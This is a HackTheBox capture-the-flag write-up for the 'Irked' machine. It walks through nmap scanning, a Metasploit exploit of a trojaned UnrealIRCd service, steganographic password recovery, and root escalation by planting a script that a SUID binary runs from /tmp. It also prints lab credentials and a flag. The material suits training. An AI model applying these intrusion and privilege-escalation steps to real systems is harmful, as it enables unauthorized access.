HackTheBox Writeups

Writeups for all the HTB boxes I have solved

View on GitHub

Irked

URL: https://www.hackthebox.eu/home/machines/profile/163

Machine IP: 10.10.10.117

DATE : 10/04/2019

Let’s start with the basics

NMAP - Full port scan

➜ nmap -p- 10.10.10.117
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-21 15:16 IST
Nmap scan report for 10.10.10.117
Host is up (0.16s latency).
Not shown: 65505 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http
111/tcp   open     rpcbind
4027/tcp  filtered bxp
6324/tcp  filtered hrd-ncs
6697/tcp  open     ircs-u
7852/tcp  filtered unknown
8067/tcp  open     infi-async
8218/tcp  filtered unknown
8901/tcp  filtered jmb-cds2
33435/tcp filtered mtrace
55801/tcp open     unknown
65534/tcp open     unknown

Nmap done: 1 IP address (1 host up) scanned in 2713.11 seconds

Okay so as usual we can see the port 22 and 80 are open. But what looked interesting was ircs-u i.e port 6697.

Why this is interesting?

Because we can try to connect with the IRC and maybe even try to exploit that.

Let’s test whether there is something fishy with the IRC service:

➜ nmap -sV --script=irc-unrealircd-backdoor 10.10.10.117 -p 6697
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-21 20:20 IST
Nmap scan report for 10.10.10.117
Host is up (0.16s latency).

PORT     STATE SERVICE VERSION
6697/tcp open  irc     UnrealIRCd
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
Service Info: Host: irked.htb

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.28 seconds

hmmm….trojaned version of IRC meaning someone has messed with it… Let’s fire up the big gun

So we use metasploit to exploit this CVE:

alt text

All the options are set Now, :boom: EXPLOIT :boom:

alt text

After Getting reverse shell I spawn the TTY shell using python:

python -c 'import pty; pty.spawn("/bin/sh")'

I spent sometime looking around and found a user called djmardov and found out that there’s a backup file in the Document folder.

$ cat /home/djmardov/Documents/.backup
cat /home/djmardov/Documents/.backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

hmm… :thinking_face:

After lot of messing around, reading forum comments and what not I figured out why it was referring to Stego. Basically If you visit the website(http://10.10.10.117/) we are prompted with the following page:

alt text

I asked myself a question what if this yellow image has something to do with Stego? So why not test this with something like steghide.

➜ steghide extract -sf irked.jpg
Enter passphrase:
wrote extracted data to "pass.txt".

Wooh!!! :tada:

I got pass.txt using UPupDOWNdownLRlrBAbaSSss as steghide password

cat pass.txt
Kab6h+m+bbp2J:HG

Use this password to login into the djmardov's account via SSH

alt text

Now just find the user.txt in the Documents folder

djmardov@irked:~$ cat ./Documents/user.txt
4a66a78b12dc0e661a59d3f5c0267a8e

Priv escalation

Now let’s run LinEnum file to see if we can find something interesting. I got something interesting in SUIDs

alt text

The viewuser command looks interesting.Executing the viewuser command I got the following output:

alt text

Notice the last line

sh: 1: /tmp/listusers: not found

So basically the viewuser command is showing all the users and then it’s trying to execute the listusers file in the /tmp directory.

Let’s go and make a file and see with what privileges it’s executing that file(it should be root because the viewuser SUID is under root)

#!/bin/bash
whoami

Now execute the viewuser command again and BOOM!!! :tada:

alt text

This mean we can execute any command as a root, so simply put the following line in the file:

#!/bin/bash

cat /root/root.txt

alt text